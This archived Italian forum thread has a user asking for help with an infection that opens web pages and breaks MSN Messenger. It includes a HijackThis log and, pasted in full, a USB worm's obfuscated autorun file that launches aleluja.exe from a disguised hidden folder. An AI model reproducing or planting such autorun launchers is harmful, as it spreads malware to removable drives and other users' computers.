PDA

View Full Version : scusate chiedo l'attenzione di tutti...


::::MaTTia::::
26-09-2009, 15:40
buonpomeriggio..

ieri sui 2 pc che ho in casa è succesa una cosa stranissima...

si è aperta una pagina web dal nulla praticamente quasi in contemporanea....


http://www.mainstories.com/
(non so se questa è legata al problema che ho fattostà non vi consiglio di aprirla)

questo è il print che ho fatto alla pagina
http://i36.tinypic.com/2le2o94.jpg


cmq dopo che si è aperta non a piu funzionato in nessuno dei 2 computer msn 2009...il programma si apre ma appena clicco su accedi esce un errore..

http://i34.tinypic.com/10ws0go.jpg


visto che uno dei due computer dovevo gia formattarlo l'ho fatto...

eccoci qui:D

computer fresco fresco istallo msn 2009 e taaaac!

solito errore!

situazione veramente bruttissima...


non so se qualla pagina che continua ad aprirsi continuamente sia collegata al problema e poi perchè è successo a tutti e 2 i pc che ho in casa?????

vi ringrazio anticipatamente!

Raffaele53
26-09-2009, 18:35
Usa HijackThis e vedi se trova qualcosa di anormale.

::::MaTTia::::
26-09-2009, 20:18
non mi sembra ci sia niente di strano

Logfile of HijackThis v1.99.1
Scan saved at 21.14.30, on 26/09/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16640)

Running processes:
D:\WINDOWS\System32\smss.exe
D:\WINDOWS\system32\winlogon.exe
D:\WINDOWS\system32\services.exe
D:\WINDOWS\system32\lsass.exe
D:\WINDOWS\system32\Ati2evxx.exe
D:\WINDOWS\system32\svchost.exe
D:\WINDOWS\system32\Ati2evxx.exe
D:\WINDOWS\system32\spoolsv.exe
D:\WINDOWS\Explorer.EXE
D:\PROGRA~1\AVG\AVG8\avgtray.exe
D:\WINDOWS\RTHDCPL.EXE
D:\WINDOWS\SOUNDMAN.EXE
D:\Programmi\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
D:\Programmi\Java\jre6\bin\jusched.exe
D:\WINDOWS\system32\ctfmon.exe
D:\Programmi\ATI Technologies\ATI.ACE\Core-Static\ccc.exe
D:\Programmi\Spybot - Search & Destroy\TeaTimer.exe
D:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
D:\Programmi\Windows Live\Messenger\msnmsgr.exe
D:\Programmi\Java\jre6\bin\jqs.exe
D:\PROGRA~1\AVG\AVG8\avgrsx.exe
D:\PROGRA~1\AVG\AVG8\avgnsx.exe
D:\WINDOWS\system32\svchost.exe
D:\PROGRA~1\AVG\AVG8\avgemc.exe
D:\Programmi\AVG\AVG8\avgcsrvx.exe
D:\WINDOWS\System32\svchost.exe
D:\WINDOWS\system32\wbem\wmiapsrv.exe
D:\Programmi\Windows Live\Contacts\wlcomm.exe
D:\Programmi\Windows Media Player\wmplayer.exe
D:\Programmi\Opera\opera.exe
D:\WINDOWS\System32\svchost.exe
D:\WINDOWS\system32\msiexec.exe
L:\Setup\Applicazioni\HijackThis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Collegamenti
R3 - URLSearchHook: AVG Security Toolbar BHO - {A3BC75A2-1F87-4686-AA43-5347D756017C} - D:\Programmi\AVG\AVG8\Toolbar\IEToolbar.dll
R3 - URLSearchHook: (no name) - *{CFBFAE00-17A6-11D0-99CB-00C04FD64497} - (no file)
O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - D:\Programmi\AVG\AVG8\avgssie.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - D:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O2 - BHO: AVG Security Toolbar BHO - {A3BC75A2-1F87-4686-AA43-5347D756017C} - D:\Programmi\AVG\AVG8\Toolbar\IEToolbar.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - D:\Programmi\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - D:\Programmi\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: AVG Security Toolbar - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - D:\Programmi\AVG\AVG8\Toolbar\IEToolbar.dll
O4 - HKLM\..\Run: [AVG8_TRAY] D:\PROGRA~1\AVG\AVG8\avgtray.exe
O4 - HKLM\..\Run: [StartCCC] "D:\Programmi\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [AlcWzrd] ALCWZRD.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [SunJavaUpdateSched] "D:\Programmi\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [UserFaultCheck] %systemroot%\system32\dumprep 0 -u
O4 - HKCU\..\Run: [CTFMON.EXE] D:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [SpybotSD TeaTimer] D:\Programmi\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [msnmsgr] "D:\Programmi\Windows Live\Messenger\msnmsgr.exe" /background
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - D:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - D:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - D:\Programmi\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - D:\Programmi\Messenger\msmsgs.exe
O11 - Options group: [INTERNATIONAL] International*
O11 - Options group: [TABS] Tabbed Browsing
O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - D:\Programmi\AVG\AVG8\avgpp.dll
O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - D:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - D:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL
O20 - Winlogon Notify: avgrsstarter - D:\WINDOWS\SYSTEM32\avgrsstx.dll
O20 - Winlogon Notify: dimsntfy - %SystemRoot%\System32\dimsntfy.dll (file missing)
O21 - SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - D:\WINDOWS\system32\WPDShServiceObj.dll
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - D:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - D:\WINDOWS\system32\ati2sgag.exe
O23 - Service: AVG Free8 E-mail Scanner (avg8emc) - AVG Technologies CZ, s.r.o. - D:\PROGRA~1\AVG\AVG8\avgemc.exe
O23 - Service: AVG Free8 WatchDog (avg8wd) - AVG Technologies CZ, s.r.o. - D:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Unknown owner - D:\Programmi\Java\jre6\bin\jqs.exe" -service -config "D:\Programmi\Java\jre6\lib\deploy\jqs\jqs.conf (file missing)



comunque ora su un pc sembra ke msn """"resista""""


ma i miei contatti dicono che gli arrivano link...

Raffaele53
27-09-2009, 09:07
Si possono fixare

O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O20 - Winlogon Notify: dimsntfy - %SystemRoot%\System32\dimsntfy.dll (file missing)

::::MaTTia::::
30-09-2009, 21:40
non succede niente....


ora o trovato il virus in una chiavetta che si è "ricreato nei pc...

è una cartella con l'icona del cestino..è visualizzabile solo se si abilita nelle opzioni cartellla la visualizzazione dei file di sistema...

poi cè un file autorun.exe

che contiene questo

[autorun
;É}?J??Øðm??ÚìXë??_vFQh?<??ù'ý?ú,?CtbÒe??ÜNt?d?!?s?.[?cC?íÇÍ?ÜØ?sØ?s???J?ñ???^??y??F??ëátÿéò???Ýf??ÜéwØ!?MrI?ùý?y??????ù?ë|?ç?Á?w??|ÈgJe???b??ÃÉ???(ÝMmr?N?}àú???Z(J?N?/??\Íæd??Ð????è?èT?ðý?I_J??Üú?LÜ
;é????tC??ÀÓ??fI?Ð:?
open=SEVERINA///aleluja.exe
;??
icon=%SystemRoot%\system32\SHELL32.dll,4
;C?fü?E?
action=Open folder*to view files using*Windows*Explorer
;?o?MMë
Shell\open\\\command=SEVERINA//aleluja.exe
;
shell\explore\\command=SEVERINA//aleluja.exe
;O?ÂÍÝ
USEAUTOPLAY=1
:GOTO NUL


sapreste aiutarmi?

Alfonso78
30-09-2009, 21:52
:mbe:

cos'è...???

un gemellaggio con la sezione antivirus...???

::::MaTTia::::
30-09-2009, 22:00
non capisco che intendi :)

cmq questo "virus" si è """moltiplicato"""

anche sul mio hdd esterno

vi allego l'immagine:)

http://i34.tinypic.com/pafcx.jpg

pegasolabs
30-09-2009, 22:00
In sezione antivirus c'è una sottosezione con modalità specifiche per chiedere aiuto. Continuate cortesemente lì. Qui siamo OT. E' la sezione networking.
Discussione Chiusa.